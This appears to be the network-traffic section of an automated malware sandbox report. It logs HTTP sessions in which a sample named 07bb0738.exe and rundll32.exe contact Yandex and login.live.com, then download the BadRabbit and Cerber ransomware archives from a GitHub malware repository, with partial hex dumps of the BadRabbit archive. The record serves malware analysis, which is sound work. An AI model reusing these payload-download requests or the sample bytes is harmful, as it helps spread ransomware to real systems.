                                                                                                                                                    2022-09-29 13:00:00 UTC38328INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 20 20 63 6c 61 73 73 3d 22 69 2d 75 61 5f 6a 73 5f 6e 6f 20 69 2d 75 61 5f 63 73 73 5f 73 74 61 6e 64 61 72 74 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 5f 75 6e 6b 6e 6f 77 6e 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 2d 65 6e 67 69 6e 65 5f 75 6e 6b 6e 6f 77 6e 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 5f 64 65 73 6b 74 6f 70 20 69 2d 75 61 5f 70 6c 61 74 66 6f 72 6d 5f 77 69 6e 64 6f 77 73 22 20 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 20 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class="i-ua_js_no i-ua_css_standart i-ua_browser_unknown i-ua_browser-engine_unknown i-ua_browser_desktop i-ua_platform_windows" lang="ru"><head xmlns:og="http://ogp.me/ns#"><meta http-equiv='Content-Type' content='text/html;chars
                                                                                                                                                    2022-09-29 13:00:00 UTC38331INData Raw: 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 6b 5f 4b 5a 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 74 5f 52 55 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 3a 61 6c 74 65 72 6e 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 75 6b 5f 55 41 22 3e 3c 73 63 72 69 70 74 20 20 3e 77 69 6e 64 6f 77 2e 68 6f 6d 65 3d 77 69 6e 64 6f 77 2e 68 6f 6d 65 7c 7c 7b 7d 2c 68 6f 6d 65 2e 6c 6f 61 64 4d 61 6e 61 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 75 62 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 3d 30 2c 72 3d 66 75 6e 63 74
                                                                                                                                                    Data Ascii: rnate" content="kk_KZ"><meta property="og:locale:alternate" content="tt_RU"><meta property="og:locale:alternate" content="uk_UA"><script >window.home=window.home||{},home.loadManager=function(){var n={},o={};return{subscribe:function(t,e){var i=0,r=funct
                                                                                                                                                    2022-09-29 13:00:00 UTC38335INData Raw: 22 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 d0 9f d0 be d0 b8 d1 81 d0 ba 20 d0 b2 20 d0 b8 d0 bd d1 82 d0 b5 d1 80 d0 bd d0 b5 d1 82 d0 b5 22 20 64 61 74 61 2d 62 65 6d 3d 22 7b 26 71 75 6f 74 3b 73 65 61 72 63 68 32 26 71 75 6f 74 3b 3a 7b 7d 7d 22 20 64 61 74 61 2d 6d 69 6e 69 2d 62 65 6d 3d 22 7b 26 71 75 6f 74 3b 6d 69 6e 69 2d 73 75 67 67 65 73 74 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 2f 79 61 6e 64 65 78 2e 72 75 2f 73 75 67 67 65 73 74 2f 73 75 67 67 65 73 74 2d 79 61 2e 63 67 69 3f 73 72 76 3d 6d 6f 72 64 61 5f 72 75 5f 64 65 73 6b 74 6f 70 26 61 6d 70 3b 77 69 7a 3d 54 72 57 74 68 26 61 6d 70 3b 75 69 6c 3d 72 75 26 61 6d 70 3b 66 61 63 74 3d 31 26 61
                                                                                                                                                    Data Ascii: " role="search" aria-label=" " data-bem="{&quot;search2&quot;:{}}" data-mini-bem="{&quot;mini-suggest&quot;:{&quot;url&quot;:&quot;//yandex.ru/suggest/suggest-ya.cgi?srv=morda_ru_desktop&amp;wiz=TrWth&amp;uil=ru&amp;fact=1&a
                                                                                                                                                    2022-09-29 13:00:00 UTC38340INData Raw: 61 69 6e 2d 69 74 65 6d 27 3e 3c 73 70 61 6e 20 20 63 6c 61 73 73 3d 22 20 73 65 72 76 69 63 65 73 5f 5f 69 63 6f 6e 20 73 65 72 76 69 63 65 73 5f 5f 69 63 6f 6e 5f 61 76 69 61 22 3e 3c 2f 73 70 61 6e 3e 3c 61 20 63 6c 61 73 73 3d 22 68 6f 6d 65 2d 6c 69 6e 6b 20 20 73 65 72 76 69 63 65 73 5f 5f 74 69 74 6c 65 2d 6c 69 6e 6b 20 68 6f 6d 65 2d 6c 69 6e 6b 5f 62 6c 75 65 5f 79 65 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 76 65 6c 2e 79 61 6e 64 65 78 2e 72 75 2f 61 76 69 61 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 79 61 6d 61 69 6e 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 65 72 76 69 63 65 2d 6c 69 73 74 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 67 65 6e 65 72 61 6c 5f 72 75 5f 64 65 73 6b 74 6f 70 5f 6e 6f 5f 61 6c 6c 26 75 74 6d 5f 63 6f 6e
                                                                                                                                                    Data Ascii: ain-item'><span class=" services__icon services__icon_avia"></span><a class="home-link services__title-link home-link_blue_yes" href="https://travel.yandex.ru/avia/?utm_source=yamain&utm_medium=service-list&utm_campaign=general_ru_desktop_no_all&utm_con


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    146192.168.2.34982040.126.32.136443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:17 UTC38345OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                    Accept: */*
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                    Content-Length: 4740
                                                                                                                                                    Host: login.live.com
                                                                                                                                                    2022-09-29 13:00:17 UTC38346OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                    2022-09-29 13:00:17 UTC38350INHTTP/1.1 200 OK
                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                    Expires: Thu, 29 Sep 2022 12:59:17 GMT
                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                    x-ms-request-id: 8c9bd703-a827-4b90-8478-bc71065832cf
                                                                                                                                                    PPServer: PPV: 30 H: BL02PF74CF01141 V: 0
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:00:16 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 11320
                                                                                                                                                    2022-09-29 13:00:17 UTC38351INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    147192.168.2.34982340.126.32.136443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:17 UTC38362OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                    Accept: */*
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                    Content-Length: 4702
                                                                                                                                                    Host: login.live.com
                                                                                                                                                    2022-09-29 13:00:17 UTC38362OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                    2022-09-29 13:00:18 UTC38367INHTTP/1.1 200 OK
                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                    Expires: Thu, 29 Sep 2022 12:59:18 GMT
                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                    x-ms-request-id: aa52f53b-af5f-4875-8d10-0e6ba3b592d9
                                                                                                                                                    PPServer: PPV: 30 H: BL02PF05B1B33B1 V: 0
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:00:18 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 10857
                                                                                                                                                    2022-09-29 13:00:18 UTC38367INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    148192.168.2.349818140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:18 UTC38378OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                    Host: github.com
                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    149140.82.121.4443192.168.2.349818C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:18 UTC38378INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:31 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 13:00:18 UTC38379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    15192.168.2.349715185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:52 UTC705OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    150192.168.2.349826185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:19 UTC38381OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    151185.199.108.133443192.168.2.349826C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:19 UTC38381INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 402632
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 5618:1220:101AF1B:11175EB:63359687
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:00:19 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6951-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456419.140500,VS0,VE1
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 22507d2f44ddb58dee70f4b04aebcb5739ea1c55
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:05:19 GMT
                                                                                                                                                    Source-Age: 91
                                                                                                                                                    2022-09-29 13:00:19 UTC38382INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                    Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                    2022-09-29 13:00:19 UTC38398INData Raw: 72 c8 31 c2 9d f7 2e 41 53 ac c7 27 ce 6b c8 aa ef 81 64 8e b4 61 a3 68 c9 b2 4f 51 0f 0c d0 0b 4c 71 6f ed 6f 20 9a 1c 07 c1 6d 4b ad 82 2e 0c d8 76 e0 4e c7 34 dc 23 56 fe 18 59 7d 9d 34 7a 07 81 2e 22 f6 07 d6 af 92 93 9e 99 79 2c 0b b5 1d 5d 9f 43 60 6b 35 90 10 b0 c8 29 dc 00 bb 73 51 54 95 38 6c 8c 8f 1a 0c 72 e7 4d 5b b9 96 5b f8 d4 55 f8 09 c0 2a 6f 2d 76 fb 69 8d 7a f1 e9 d7 35 17 79 fe 2e 8d 55 4d c4 34 a7 1b 02 fe 6e da 8b 97 a7 6e 37 9d 8e cd ae 2b 76 01 4d 9e 15 87 c4 e4 66 02 e2 98 84 31 d0 d4 14 3d 69 e4 12 90 c3 81 a2 a1 71 8a 43 d3 5b c6 fb 0f 0a 40 50 0f e0 8e 4a 58 d9 62 7b 0b 99 1d df 17 a6 67 a8 30 f0 a7 69 b9 75 d6 77 57 ef e2 8b a1 25 9f 21 41 dd f6 20 66 52 70 20 57 c0 71 32 bf ee 40 86 cb d3 32 03 76 87 d4 20 f2 0c 0a 9e 32 dd 55
                                                                                                                                                    Data Ascii: r1.AS'kdahOQLqoo mK.vN4#VY}4z."y,]C`k5)sQT8lrM[[U*o-viz5y.UM4nn7+vMf1=iqC[@PJXb{g0iuwW%!A fRp Wq2@2v 2U
                                                                                                                                                    2022-09-29 13:00:19 UTC38414INData Raw: df 68 45 73 e0 48 d9 9a 68 44 7f cf 25 7e 2c f7 a7 f0 68 54 12 ed d0 2a 22 31 10 ac a1 e1 77 4c 42 a9 31 71 f8 97 16 75 01 a1 1e e1 e1 17 fe 10 23 57 f6 34 80 ff 56 f2 aa 8a 75 ce 91 d4 8c 17 b0 44 67 6d fb 81 09 a0 08 4a fe 24 1e 2f a0 22 14 da d0 bb eb 65 1c fe 98 44 82 fc 8d e5 aa 15 d7 39 42 ae ee c7 8d d4 a1 d4 02 21 3b 0b 24 38 c4 0b d7 38 98 f6 c4 fc a6 80 1d 85 23 73 a9 a9 15 94 27 53 8a 2e 99 55 5e d4 a2 78 66 8e 6d d4 f6 02 ed 7e 13 40 15 8b b9 82 b2 dd 13 fb f0 5b 1e 54 0f 2e 43 8b ca 26 60 fe a3 8e 21 1a fa df 98 d7 6a 59 63 d7 16 27 df f6 07 fe 81 80 1b f1 18 90 3b 3d 7f 64 eb 30 2b d7 59 85 a0 c7 bf 41 be d8 4a d4 0e bd 61 31 21 ea 8f c9 86 ad 0f 6b 39 52 a9 14 fd f1 7d 1f fc 66 70 5c b7 2a 1f d3 7d 54 f2 17 8e a5 98 7e 5b 75 54 c0 49 10 62
                                                                                                                                                    Data Ascii: hEsHhD%~,hT*"1wLB1qu#W4VuDgmJ$/"eD9B!;$88#s'S.U^xfm~@[T.C&`!jYc';=d0+YAJa1!k9R}fp\*}T~[uTIb
                                                                                                                                                    2022-09-29 13:00:19 UTC38430INData Raw: c3 a0 6b 5f 9d ce 11 cf 59 14 7f b2 aa 14 34 99 4d ce 0c a5 85 81 79 45 d1 74 4a 6f 00 aa e4 8c 0e 69 de 4e 90 e7 67 97 7d 3a d9 6b f2 d5 9a 38 fb 8f f7 c0 52 ae 61 47 33 08 16 e3 39 ee ee c8 96 3c 11 6c 39 ba 9a b8 7a 07 c4 d8 f2 f7 97 b1 15 17 ff a2 1a dd f1 7e 85 38 2f 9d e5 80 f3 9f b3 d8 5b 23 1b 2a 83 4b d6 52 de b1 99 e2 e9 f5 41 77 0e 1b 02 6f 18 79 c1 5a 06 84 21 c6 39 b2 28 51 0d e3 1a 6a 8a 22 b1 52 ba 7f a3 10 23 0f 18 f4 9b 7f 22 38 8a 2e 9b cb 3a b1 01 19 21 17 c9 ec 7d 6a a8 f1 4a 1b 2a a1 1f b8 83 72 e1 9b ef eb ae 43 20 62 15 6e 87 c4 84 92 cc 79 4c 84 fa b4 10 67 22 48 cd b7 58 d7 8a 11 c3 48 64 fd 1f f6 92 0a ce f6 1a 5f 92 30 a1 92 09 2d 29 75 d9 45 d3 73 d6 61 82 68 6f d7 f8 a1 50 01 d4 f6 b9 38 c0 2f 02 24 0f 42 83 46 db bc b6 e2 80
                                                                                                                                                    Data Ascii: k_Y4MyEtJoiNg}:k8RaG39<l9z~8/[#*KRAwoyZ!9(Qj"R#"8.:!}jJ*rC bnyLg"HXHd_0-)uEsahoP8/$BF
                                                                                                                                                    2022-09-29 13:00:19 UTC38446INData Raw: d3 e8 b3 a5 57 bb 0f 80 8e 4a d0 94 cd 31 b7 fc 52 9b dd ec 1d 0e df e2 b2 72 10 11 45 d0 13 e7 46 73 0e ee 88 25 59 a0 87 52 2a 7f f1 c9 04 38 b2 8a 86 e3 55 b0 df 6d 8e 1c 77 b0 01 ac 10 05 04 6b ae 2b 3b 5e bf 4a ed 73 d8 ab d3 cf fb a8 6e a2 bc 4f 41 2d c4 15 83 39 f0 dd 86 d1 ca 20 b5 c3 a8 59 39 4c 02 66 11 12 8e 3d b1 f1 60 78 f2 6b e1 ac 59 82 ea 00 59 c1 52 94 4e 15 f8 64 8a cb b7 a7 02 ac 35 7d a2 41 76 da e4 c6 75 30 50 5a d7 bc ec 8f b5 23 13 c9 ba fb ef 45 7f eb 5a e2 8f 23 36 26 7f 40 df 34 a3 e1 62 b2 12 aa ad e7 23 b5 ca 8b 71 b0 44 0a 27 af dd 1e 19 7d 21 dd be 40 7a 66 f1 99 77 2e 7c dc 11 fd 78 b3 18 30 1a e9 85 ba 8d ad 5b f5 01 38 d7 04 ee 9a 7d 9b 2d 3a 21 53 ff 71 58 63 ea e3 5d 5b aa d2 86 cf c9 f7 50 41 78 22 be a2 af af 77 21 ea
                                                                                                                                                    Data Ascii: WJ1RrEFs%YR*8Umwk+;^JsnOA-9 Y9Lf=`xkYYRNd5}Avu0PZ#EZ#6&@4b#qD'}!@zfw.|x0[8}-:!SqXc][PAx"w!
